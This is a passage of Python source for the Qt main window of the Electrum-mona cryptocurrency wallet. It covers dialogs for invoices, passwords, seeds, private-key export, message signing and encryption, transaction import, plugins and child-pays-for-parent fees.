label) self.contact_list.update() self.history_list.update() self.update_completions() return True def delete_contacts(self, labels): if not self.question(_("Remove {} from your list of contacts?") .format(" + ".join(labels))): return for label in labels: self.contacts.pop(label) self.history_list.update() self.contact_list.update() self.update_completions() def show_invoice(self, key): invoice = self.wallet.get_invoice(key) if invoice is None: self.show_error('Cannot find payment request in wallet.') return bip70 = invoice.get('bip70') if bip70: pr = paymentrequest.PaymentRequest(bytes.fromhex(bip70)) pr.verify(self.contacts) 
self.show_bip70_details(pr) def show_bip70_details(self, pr): key = pr.get_id() d = WindowModalDialog(self, _("BIP70 Invoice")) vbox = QVBoxLayout(d) grid = QGridLayout() grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0) grid.addWidget(QLabel(pr.get_requestor()), 0, 1) grid.addWidget(QLabel(_("Amount") + ':'), 1, 0) outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs())) grid.addWidget(QLabel(outputs_str), 1, 1) expires = pr.get_expiration_date() grid.addWidget(QLabel(_("Memo") + ':'), 2, 0) grid.addWidget(QLabel(pr.get_memo()), 2, 1) grid.addWidget(QLabel(_("Signature") + ':'), 3, 0) grid.addWidget(QLabel(pr.get_verify_status()), 3, 1) if expires: grid.addWidget(QLabel(_("Expires") + ':'), 4, 0) grid.addWidget(QLabel(format_time(expires)), 4, 1) vbox.addLayout(grid) def do_export(): name = str(key) + '.bip70' fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70") if not fn: return with open(fn, 'wb') as f: data = f.write(pr.raw) self.show_message(_('Invoice saved as' + ' ' + fn)) exportButton = EnterButton(_('Save'), do_export) def do_delete(): if self.question(_('Delete invoice?')): self.wallet.delete_invoices(key) self.history_list.update() self.invoice_list.update() d.close() deleteButton = EnterButton(_('Delete'), do_delete) vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d))) d.exec_() def pay_bip70_invoice(self, key): pr = self.wallet.get_invoice(key) self.payment_request = pr self.prepare_for_payment_request() pr.error = None # this forces verify() to re-run if pr.verify(self.contacts): self.payment_request_ok() else: self.payment_request_error() def create_console_tab(self): from .console import Console self.console = console = Console() return console def update_console(self): console = self.console console.history = self.wallet.storage.get("qt-console-history", []) console.history_index = len(console.history) console.updateNamespace({ 'wallet': self.wallet, 
            'network': self.network,
            'plugins': self.gui_object.plugins,
            'window': self,
            'config': self.config,
            'electrum': electrum_mona,
            'daemon': self.gui_object.daemon,
            'util': util,
            'bitcoin': bitcoin,
        })

        c = commands.Commands(config=self.config,
                              network=self.network,
                              callback=lambda: self.console.set_json(True))
        methods = {}
        def mkfunc(f, method):
            # Each console command runs c._run with the GUI password dialog and wallet injected.
            return lambda *args, **kwargs: f(method,
                                             args,
                                             self.password_dialog,
                                             **{**kwargs, 'wallet': self.wallet})
        for m in dir(c):
            if m[0]=='_' or m in ['network','wallet','config']: continue
            methods[m] = mkfunc(c._run, m)

        console.updateNamespace(methods)

    def create_status_bar(self):
        """Build the main-window status bar: balance label, search box,
        update-check button, and password/preferences/seed/network buttons."""
        sb = QStatusBar()
        sb.setFixedHeight(35)

        self.balance_label = QLabel("Loading wallet...")
        self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
        self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
        sb.addWidget(self.balance_label)

        self.search_box = QLineEdit()
        self.search_box.textChanged.connect(self.do_search)
        self.search_box.hide()
        sb.addPermanentWidget(self.search_box)

        self.update_check_button = QPushButton("")
        self.update_check_button.setFlat(True)
        self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
        self.update_check_button.setIcon(read_QIcon("update.png"))
        self.update_check_button.hide()
        sb.addPermanentWidget(self.update_check_button)

        self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog)
        sb.addPermanentWidget(self.password_button)

        sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog))
        self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog)
        sb.addPermanentWidget(self.seed_button)
        self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"),
                                             lambda: self.gui_object.show_network_dialog(self))
        sb.addPermanentWidget(self.status_button)
        run_hook('create_status_bar', sb)
        self.setStatusBar(sb)

    def update_lock_icon(self):
        """Show a locked/unlocked padlock depending on whether the wallet has a password."""
        icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
        self.password_button.setIcon(icon)

    def update_buttons_on_seed(self):
        self.seed_button.setVisible(self.wallet.has_seed())
        self.password_button.setVisible(self.wallet.may_have_password())
        self.send_button.setVisible(not self.wallet.is_watching_only())

    def change_password_dialog(self):
        """Change/disable the wallet password. Hardware wallets that encrypt
        storage with an xpub-derived key use a dedicated dialog."""
        from electrum_mona.storage import StorageEncryptionVersion
        if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
            from .password_dialog import ChangePasswordDialogForHW
            d = ChangePasswordDialogForHW(self, self.wallet)
            ok, encrypt_file = d.run()
            if not ok:
                return
            try:
                hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
            except UserCancelled:
                return
            except BaseException as e:
                self.logger.exception('')
                self.show_error(repr(e))
                return
            old_password = hw_dev_pw if self.wallet.has_password() else None
            new_password = hw_dev_pw if encrypt_file else None
        else:
            from .password_dialog import ChangePasswordDialogForSW
            d = ChangePasswordDialogForSW(self, self.wallet)
            ok, old_password, new_password, encrypt_file = d.run()

        if not ok:
            return
        try:
            self.wallet.update_password(old_password, new_password, encrypt_file)
        except InvalidPassword as e:
            self.show_error(str(e))
            return
        except BaseException:
            self.logger.exception('Failed to update password')
            self.show_error(_('Failed to update password'))
            return
        msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
        self.show_message(msg, title=_("Success"))
        self.update_lock_icon()

    def toggle_search(self):
        """Show/hide the status-bar search box; clearing the filter when hiding."""
        tab = self.tabs.currentWidget()
        #if hasattr(tab, 'searchable_list'):
        #    tab.searchable_list.toggle_toolbar()
        #return
        self.search_box.setHidden(not self.search_box.isHidden())
        if not self.search_box.isHidden():
            self.search_box.setFocus(1)
        else:
            self.do_search('')

    def do_search(self, t):
        """Apply the search text to the current tab's searchable list, if it has one."""
        tab = self.tabs.currentWidget()
        if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t) def new_contact_dialog(self): d = WindowModalDialog(self, _("New Contact")) vbox = QVBoxLayout(d) vbox.addWidget(QLabel(_('New Contact') + ':')) grid = QGridLayout() line1 = QLineEdit() line1.setFixedWidth(32 * char_width_in_lineedit()) line2 = QLineEdit() line2.setFixedWidth(32 * char_width_in_lineedit()) grid.addWidget(QLabel(_("Address")), 1, 0) grid.addWidget(line1, 1, 1) grid.addWidget(QLabel(_("Name")), 2, 0) grid.addWidget(line2, 2, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if d.exec_(): self.set_contact(line2.text(), line1.text()) def show_master_public_keys(self): dialog = WindowModalDialog(self, _("Wallet Information")) dialog.setMinimumSize(500, 100) mpk_list = self.wallet.get_master_public_keys() vbox = QVBoxLayout() wallet_type = self.wallet.storage.get('wallet_type', '') if self.wallet.is_watching_only(): wallet_type += ' [{}]'.format(_('watching-only')) seed_available = _('True') if self.wallet.has_seed() else _('False') keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()] grid = QGridLayout() basename = os.path.basename(self.wallet.storage.path) grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0) grid.addWidget(QLabel(basename), 0, 1) grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0) grid.addWidget(QLabel(wallet_type), 1, 1) grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0) grid.addWidget(QLabel(self.wallet.txin_type), 2, 1) grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0) grid.addWidget(QLabel(str(seed_available)), 3, 1) if len(keystore_types) <= 1: grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0) ks_type = str(keystore_types[0]) if keystore_types else _('No keystore') grid.addWidget(QLabel(ks_type), 4, 1) vbox.addLayout(grid) if self.wallet.is_deterministic(): mpk_text = ShowQRTextEdit() mpk_text.setMaximumHeight(150) mpk_text.addCopyButton(self.app) def show_mpk(index): mpk_text.setText(mpk_list[index]) mpk_text.repaint() # macOS hack for #4777 
            # only show the combobox in case multiple accounts are available
            if len(mpk_list) > 1:
                # only show the combobox if multiple master keys are defined
                def label(idx, ks):
                    if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
                        return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
                    else:
                        return _("keystore") + f' {idx+1}'
                labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
                on_click = lambda clayout: show_mpk(clayout.selected_index())
                labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
                vbox.addLayout(labels_clayout.layout())
            else:
                vbox.addWidget(QLabel(_("Master Public Key")))
            show_mpk(0)
            vbox.addWidget(mpk_text)
        vbox.addStretch(1)
        btns = run_hook('wallet_info_buttons', self, dialog) or Buttons(CloseButton(dialog))
        vbox.addLayout(btns)
        dialog.setLayout(vbox)
        dialog.exec_()

    def remove_wallet(self):
        """Ask for confirmation, then delete the wallet file from disk."""
        if self.question('\n'.join([
                _('Delete wallet file?'),
                "%s"%self.wallet.storage.path,
                _('If your wallet contains funds, make sure you have saved its seed.')])):
            self._delete_wallet()

    @protected
    def _delete_wallet(self, password):
        # Password-gated actual deletion; closes this window either way.
        wallet_path = self.wallet.storage.path
        basename = os.path.basename(wallet_path)
        r = self.gui_object.daemon.delete_wallet(wallet_path)
        self.close()
        if r:
            self.show_error(_("Wallet removed: {}").format(basename))
        else:
            self.show_error(_("Wallet file not found: {}").format(basename))

    @protected
    def show_seed_dialog(self, password):
        """Show the wallet seed (and passphrase) after password verification."""
        if not self.wallet.has_seed():
            self.show_message(_('This wallet has no seed'))
            return
        keystore = self.wallet.get_keystore()
        try:
            seed = keystore.get_seed(password)
            passphrase = keystore.get_passphrase(password)
        except BaseException as e:
            self.show_error(repr(e))
            return
        from .seed_dialog import SeedDialog
        d = SeedDialog(self, seed, passphrase)
        d.exec_()

    def show_qrcode(self, data, title = _("QR code"), parent=None):
        """Display arbitrary data as a QR code in a modal dialog."""
        if not data:
            return
        d = QRDialog(data, parent or self, title)
        d.exec_()

    @protected
    def show_private_key(self, address, password):
        """Export and display the private key (and redeem script) for one address."""
        if not address:
            return
        try:
            pk, redeem_script = self.wallet.export_private_key(address, password)
        except Exception as e:
            self.logger.exception('')
            self.show_message(repr(e))
            return
        xtype = bitcoin.deserialize_privkey(pk)[0]
        d = WindowModalDialog(self, _("Private key"))
        d.setMinimumSize(600, 150)
        vbox = QVBoxLayout()
        vbox.addWidget(QLabel(_("Address") + ': ' + address))
        vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
        vbox.addWidget(QLabel(_("Private key") + ':'))
        keys_e = ShowQRTextEdit(text=pk)
        keys_e.addCopyButton(self.app)
        vbox.addWidget(keys_e)
        if redeem_script:
            vbox.addWidget(QLabel(_("Redeem Script") + ':'))
            rds_e = ShowQRTextEdit(text=redeem_script)
            rds_e.addCopyButton(self.app)
            vbox.addWidget(rds_e)
        vbox.addLayout(Buttons(CloseButton(d)))
        d.setLayout(vbox)
        d.exec_()

    # Shown when the selected address type cannot sign/verify messages.
    msg_sign = _("Signing with an address actually means signing with the corresponding "
                 "private key, and verifying with the corresponding public key. The "
                 "address you have entered does not have a unique public key, so these "
                 "operations cannot be performed.") + '\n\n' + \
               _('The operation is undefined. Not just in Electrum, but in general.')

    @protected
    def do_sign(self, address, message, signature, password):
        """Sign the message with the given address's key; writes base64 into the signature widget."""
        address = address.text().strip()
        message = message.toPlainText().strip()
        if not bitcoin.is_address(address):
            self.show_message(_('Invalid Bitcoin address.'))
            return
        if self.wallet.is_watching_only():
            self.show_message(_('This is a watching-only wallet.'))
            return
        if not self.wallet.is_mine(address):
            self.show_message(_('Address not in wallet.'))
            return
        txin_type = self.wallet.get_txin_type(address)
        if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
            self.show_message(_('Cannot sign messages with this type of address:') + \
                              ' ' + txin_type + '\n\n' + self.msg_sign)
            return
        task = partial(self.wallet.sign_message, address, message, password)

        def show_signed_message(sig):
            try:
                signature.setText(base64.b64encode(sig).decode('ascii'))
            except RuntimeError:
                # (signature) wrapped C/C++ object has been deleted
                pass
        self.wallet.thread.add(task, on_success=show_signed_message)

    def do_verify(self, address, message, signature):
        """Verify a base64 signature over the message against the given address."""
        address = address.text().strip()
        message = message.toPlainText().strip().encode('utf-8')
        if not bitcoin.is_address(address):
            self.show_message(_('Invalid Bitcoin address.'))
            return
        try:
            # This can throw on invalid base64
            sig = base64.b64decode(str(signature.toPlainText()))
            verified = ecc.verify_message_with_address(address, sig, message)
        except Exception as e:
            verified = False
        if verified:
            self.show_message(_("Signature verified"))
        else:
            self.show_error(_("Wrong signature"))

    def sign_verify_message(self, address=''):
        """Modal dialog with message/address/signature fields and Sign/Verify buttons."""
        d = WindowModalDialog(self, _('Sign/verify Message'))
        d.setMinimumSize(610, 290)
        layout = QGridLayout(d)

        message_e = QTextEdit()
        message_e.setAcceptRichText(False)
        layout.addWidget(QLabel(_('Message')), 1, 0)
        layout.addWidget(message_e, 1, 1)
        layout.setRowStretch(2,3)

        address_e = QLineEdit()
        address_e.setText(address)
        layout.addWidget(QLabel(_('Address')), 2, 0)
        layout.addWidget(address_e, 2, 1)

        signature_e = QTextEdit()
signature_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Signature')), 3, 0) layout.addWidget(signature_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Sign")) b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Verify")) b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() @protected def do_decrypt(self, message_e, pubkey_e, encrypted_e, password): if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return cyphertext = encrypted_e.toPlainText() task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password) def setText(text): try: message_e.setText(text.decode('utf-8')) except RuntimeError: # (message_e) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=setText) def do_encrypt(self, message_e, pubkey_e, encrypted_e): message = message_e.toPlainText() message = message.encode('utf-8') try: public_key = ecc.ECPubkey(bfh(pubkey_e.text())) except BaseException as e: self.logger.exception('Invalid Public key') self.show_warning(_('Invalid Public key')) return encrypted = public_key.encrypt_message(message) encrypted_e.setText(encrypted.decode('ascii')) def encrypt_message(self, address=''): d = WindowModalDialog(self, _('Encrypt/decrypt Message')) d.setMinimumSize(610, 490) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) pubkey_e = QLineEdit() if address: pubkey = self.wallet.get_public_key(address) pubkey_e.setText(pubkey) layout.addWidget(QLabel(_('Public key')), 2, 0) layout.addWidget(pubkey_e, 2, 1) encrypted_e = QTextEdit() encrypted_e.setAcceptRichText(False) 
        layout.addWidget(QLabel(_('Encrypted')), 3, 0)
        layout.addWidget(encrypted_e, 3, 1)
        layout.setRowStretch(3,1)

        hbox = QHBoxLayout()

        b = QPushButton(_("Encrypt"))
        b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
        hbox.addWidget(b)

        b = QPushButton(_("Decrypt"))
        b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
        hbox.addWidget(b)

        b = QPushButton(_("Close"))
        b.clicked.connect(d.accept)
        hbox.addWidget(b)
        layout.addLayout(hbox, 4, 1)
        d.exec_()

    def password_dialog(self, msg=None, parent=None):
        """Prompt for the wallet password; returns the entry or None on cancel."""
        from .password_dialog import PasswordDialog
        parent = parent or self
        d = PasswordDialog(parent, msg)
        return d.run()

    def tx_from_text(self, txt) -> Optional[Transaction]:
        """Parse raw transaction text; shows an error dialog and returns None on failure."""
        from electrum_mona.transaction import tx_from_str
        try:
            tx = tx_from_str(txt)
            return Transaction(tx)
        except BaseException as e:
            self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
            return

    def read_tx_from_qrcode(self):
        """Scan a QR code: either a monacoin: URI (starts a payment) or a
        base43-encoded offline-signed transaction (shown in the tx dialog)."""
        from electrum_mona import qrscanner
        try:
            data = qrscanner.scan_barcode(self.config.get_video_device())
        except BaseException as e:
            self.show_error(repr(e))
            return
        if not data:
            return
        # if the user scanned a bitcoin URI
        if str(data).startswith("monacoin:"):
            self.pay_to_URI(data)
            return
        # else if the user scanned an offline signed tx
        try:
            data = bh2u(bitcoin.base_decode(data, length=None, base=43))
        except BaseException as e:
            self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
            return
        tx = self.tx_from_text(data)
        if not tx:
            return
        self.show_transaction(tx)

    def read_tx_from_file(self) -> Optional[Transaction]:
        """Load a transaction from a user-selected *.txn file."""
        fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
        if not fileName:
            return
        try:
            with open(fileName, "r") as f:
                file_content = f.read()
        except (ValueError, IOError, os.error) as reason:
            self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
                               title=_("Unable to read file or no transaction found"))
            return
        return self.tx_from_text(file_content)

    def do_process_from_text(self):
        """Paste-a-raw-transaction dialog; shows the parsed tx on success."""
        text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
        if not text:
            return
        tx = self.tx_from_text(text)
        if tx:
            self.show_transaction(tx)

    def do_process_from_file(self):
        tx = self.read_tx_from_file()
        if tx:
            self.show_transaction(tx)

    def do_process_from_txid(self):
        """Fetch a transaction by txid from the network and display it."""
        from electrum_mona import transaction
        txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
        if ok and txid:
            txid = str(txid).strip()
            try:
                raw_tx = self.network.run_from_another_thread(
                    self.network.get_transaction(txid, timeout=10))
            except Exception as e:
                self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
                return
            tx = transaction.Transaction(raw_tx)
            self.show_transaction(tx)

    @protected
    def export_privkeys_dialog(self, password):
        """Export all wallet private keys to a CSV/JSON file (password gated).
        NOTE: definition continues beyond this chunk of the file."""
        if self.wallet.is_watching_only():
            self.show_message(_("This is a watching-only wallet"))
            return

        if isinstance(self.wallet, Multisig_Wallet):
            self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
                              _('It cannot be "backed up" by simply exporting these private keys.'))

        d = WindowModalDialog(self, _('Private keys'))
        d.setMinimumSize(980, 300)
        vbox = QVBoxLayout(d)

        msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
                              _("Exposing a single private key can compromise your entire wallet!"),
                              _("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
        vbox.addWidget(QLabel(msg))

        e = QTextEdit()
        e.setReadOnly(True)
        vbox.addWidget(e)

        defaultname = 'electrum-mona-private-keys.csv'
        select_msg = _('Select file to export your private keys to')
        hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
        vbox.addLayout(hbox)

        b = OkButton(d, _('Export'))
        b.setEnabled(False)
        vbox.addLayout(Buttons(CancelButton(d), b))

        private_keys = {}
        addresses = self.wallet.get_addresses()
        done = False
        cancelled = False
        def privkeys_thread():
            for addr in
addresses: time.sleep(0.1) if done or cancelled: break privkey = self.wallet.export_private_key(addr, password)[0] private_keys[addr] = privkey self.computing_privkeys_signal.emit() if not cancelled: self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.emit() def show_privkeys(): s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items())) e.setText(s) b.setEnabled(True) self.show_privkeys_signal.disconnect() nonlocal done done = True def on_dialog_closed(*args): nonlocal done nonlocal cancelled if not done: cancelled = True self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.disconnect() self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses)))) self.show_privkeys_signal.connect(show_privkeys) d.finished.connect(on_dialog_closed) threading.Thread(target=privkeys_thread).start() if not d.exec_(): done = True return filename = filename_e.text() if not filename: return try: self.do_export_privkeys(filename, private_keys, csv_button.isChecked()) except (IOError, os.error) as reason: txt = "\n".join([ _("Electrum was unable to produce a private key-export."), str(reason) ]) self.show_critical(txt, title=_("Unable to create csv")) except Exception as e: self.show_message(repr(e)) return self.show_message(_("Private keys exported.")) def do_export_privkeys(self, fileName, pklist, is_csv): with open(fileName, "w+") as f: if is_csv: transaction = csv.writer(f) transaction.writerow(["address", "private_key"]) for addr, pk in pklist.items(): transaction.writerow(["%34s"%addr,pk]) else: f.write(json.dumps(pklist, indent = 4)) def do_import_labels(self): def import_labels(path): def _validate(data): return data # TODO def import_labels_assign(data): for key, value in data.items(): self.wallet.set_label(key, value) import_meta(path, _validate, import_labels_assign) def on_import(): self.need_update.set() import_meta_gui(self, _('labels'), import_labels, on_import) def 
do_export_labels(self): def export_labels(filename): export_meta(self.wallet.labels, filename) export_meta_gui(self, _('labels'), export_labels) def sweep_key_dialog(self): d = WindowModalDialog(self, title=_('Sweep private keys')) d.setMinimumSize(600, 300) vbox = QVBoxLayout(d) hbox_top = QHBoxLayout() hbox_top.addWidget(QLabel(_("Enter private keys:"))) hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) vbox.addLayout(hbox_top) keys_e = ScanQRTextEdit(allow_multi=True) keys_e.setTabChangesFocus(True) vbox.addWidget(keys_e) addresses = self.wallet.get_unused_addresses() if not addresses: try: addresses = self.wallet.get_receiving_addresses() except AttributeError: addresses = self.wallet.get_addresses() h, address_e = address_field(addresses) vbox.addLayout(h) vbox.addStretch(1) button = OkButton(d, _('Sweep')) vbox.addLayout(Buttons(CancelButton(d), button)) button.setEnabled(False) def get_address(): addr = str(address_e.text()).strip() if bitcoin.is_address(addr): return addr def get_pk(*, raise_on_error=False): text = str(keys_e.toPlainText()) return keystore.get_private_keys(text, raise_on_error=raise_on_error) def on_edit(): valid_privkeys = False try: valid_privkeys = get_pk(raise_on_error=True) is not None except Exception as e: button.setToolTip(f'{_("Error")}: {repr(e)}') else: button.setToolTip('') button.setEnabled(get_address() is not None and valid_privkeys) on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet()) keys_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_address) on_address(str(address_e.text())) if not d.exec_(): return # user pressed "sweep" addr = get_address() try: self.wallet.check_address(addr) except InternalAddressCorruption as e: self.show_error(str(e)) raise try: coins, keypairs = sweep_preparations(get_pk(), self.network) except Exception as e: # FIXME too broad... 
self.show_message(repr(e)) return self.do_clear() self.tx_external_keypairs = keypairs self.spend_coins(coins) self.payto_e.setText(addr) self.spend_max() self.payto_e.setFrozen(True) self.amount_e.setFrozen(True) self.warn_if_watching_only() def _do_import(self, title, header_layout, func): text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True) if not text: return keys = str(text).split() good_inputs, bad_inputs = func(keys) if good_inputs: msg = '\n'.join(good_inputs[:10]) if len(good_inputs) > 10: msg += '\n...' self.show_message(_("The following addresses were added") + f' ({len(good_inputs)}):\n' + msg) if bad_inputs: msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10]) if len(bad_inputs) > 10: msg += '\n...' self.show_error(_("The following inputs could not be imported") + f' ({len(bad_inputs)}):\n' + msg) self.address_list.update() self.history_list.update() def import_addresses(self): if not self.wallet.can_import_address(): return title, msg = _('Import addresses'), _("Enter addresses")+':' self._do_import(title, msg, self.wallet.import_addresses) @protected def do_import_privkey(self, password): if not self.wallet.can_import_privkey(): return title = _('Import private keys') header_layout = QHBoxLayout() header_layout.addWidget(QLabel(_("Enter private keys")+':')) header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password)) def update_fiat(self): b = self.fx and self.fx.is_enabled() self.fiat_send_e.setVisible(b) self.fiat_receive_e.setVisible(b) self.history_list.update() self.address_list.refresh_headers() self.address_list.update() self.update_status() def settings_dialog(self): from .settings_dialog import SettingsDialog d = SettingsDialog(self, self.config) self.alias_received_signal.connect(d.set_alias_color) d.exec_() self.alias_received_signal.disconnect(d.set_alias_color) if self.fx: 
self.fx.trigger_update() run_hook('close_settings_dialog') if d.need_restart: self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success')) def closeEvent(self, event): # It seems in some rare cases this closeEvent() is called twice if not self.cleaned_up: self.cleaned_up = True self.clean_up() event.accept() def clean_up(self): self.wallet.thread.stop() if self.network: self.network.unregister_callback(self.on_network) self.config.set_key("is_maximized", self.isMaximized()) if not self.isMaximized(): g = self.geometry() self.wallet.storage.put("winpos-qt", [g.left(),g.top(), g.width(),g.height()]) self.wallet.storage.put("qt-console-history", self.console.history[-50:]) if self.qr_window: self.qr_window.close() self.close_wallet() self.gui_object.timer.timeout.disconnect(self.timer_actions) self.gui_object.close_window(self) def plugins_dialog(self): self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins')) plugins = self.gui_object.plugins vbox = QVBoxLayout(d) # plugins scroll = QScrollArea() scroll.setEnabled(True) scroll.setWidgetResizable(True) scroll.setMinimumSize(400,250) vbox.addWidget(scroll) w = QWidget() scroll.setWidget(w) w.setMinimumHeight(plugins.count() * 35) grid = QGridLayout() grid.setColumnStretch(0,1) w.setLayout(grid) settings_widgets = {} def enable_settings_widget(p, name, i): widget = settings_widgets.get(name) if not widget and p and p.requires_settings(): widget = settings_widgets[name] = p.settings_widget(d) grid.addWidget(widget, i, 1) if widget: widget.setEnabled(bool(p and p.is_enabled())) def do_toggle(cb, name, i): p = plugins.toggle(name) cb.setChecked(bool(p)) enable_settings_widget(p, name, i) run_hook('init_qt', self.gui_object) for i, descr in enumerate(plugins.descriptions.values()): full_name = descr['__name__'] prefix, _separator, name = full_name.rpartition('.') p = plugins.get(name) if descr.get('registers_keystore'): continue try: cb = QCheckBox(descr['fullname']) 
plugin_is_loaded = p is not None cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet) or plugin_is_loaded and p.can_user_disable()) cb.setEnabled(cb_enabled) cb.setChecked(plugin_is_loaded and p.is_enabled()) grid.addWidget(cb, i, 0) enable_settings_widget(p, name, i) cb.clicked.connect(partial(do_toggle, cb, name, i)) msg = descr['description'] if descr.get('requires'): msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires'))) grid.addWidget(HelpButton(msg), i, 2) except Exception: self.logger.exception(f"cannot display plugin {name}") grid.setRowStretch(len(plugins.descriptions.values()), 1) vbox.addLayout(Buttons(CloseButton(d))) d.exec_() def cpfp(self, parent_tx: Transaction, new_tx: Transaction) -> None: total_size = parent_tx.estimated_size() + new_tx.estimated_size() parent_txid = parent_tx.txid() assert parent_txid parent_fee = self.wallet.get_tx_fee(parent_txid) if parent_fee is None: self.show_error(_("Can't CPFP: unknown fee for parent transaction.")) return d = WindowModalDialog(self, _('Child Pays for Parent')) vbox = QVBoxLayout(d) msg = ( "A CPFP is a transaction that sends an unconfirmed output back to " "yourself, with a high fee. The goal is to have miners confirm " "the parent transaction in order to get the fee attached to the " "child transaction.") vbox.addWidget(WWLabel(_(msg))) msg2 = ("The proposed fee is computed using your " "fee/kB settings, applied to the total size of both child and " "parent transactions. 
After you broadcast a CPFP transaction, " "it is normal to see a new unconfirmed transaction in your history.") vbox.addWidget(WWLabel(_(msg2))) grid = QGridLayout() grid.addWidget(QLabel(_('Total size') + ':'), 0, 0) grid.addWidget(QLabel('%d bytes'% total_size), 0, 1) max_fee = new_tx.output_value() grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0) grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1) output_amount = QLabel('') grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0) grid.addWidget(output_amount, 2, 1) fee_e = BTCAmountEdit(self.get_decimal_point) # FIXME with dyn fees, without estimates, there are all kinds of crashes here combined_fee = QLabel('') combined_feerate = QLabel('') def on_fee_edit(x): out_amt = max_fee - fee_e.get_amount() out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else '' output_amount.setText(out_amt_str) comb_fee = parent_fee + fee_e.get_amount() comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else '' combined_fee.setText(comb_fee_str) comb_feerate = comb_fee / total_size * 1000 comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else '' combined_feerate.setText(comb_feerate_str) fee_e.textChanged.connect(on_fee_edit) def get_child_fee_from_total_feerate(fee_per_kb): fee = fee_per_kb * total_size / 1000 - parent_fee fee = min(max_fee, fee) fee = max(total_size, fee) # pay at least 1 sat/byte for combined size return fee suggested_feerate = self.config.fee_per_kb() if suggested_feerate is None: self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''') return fee = get_child_fee_from_total_feerate(suggested_feerate) fee_e.setAmount(fee) grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0) grid.addWidget(fee_e, 3, 1) def on_rate(dyn, pos, 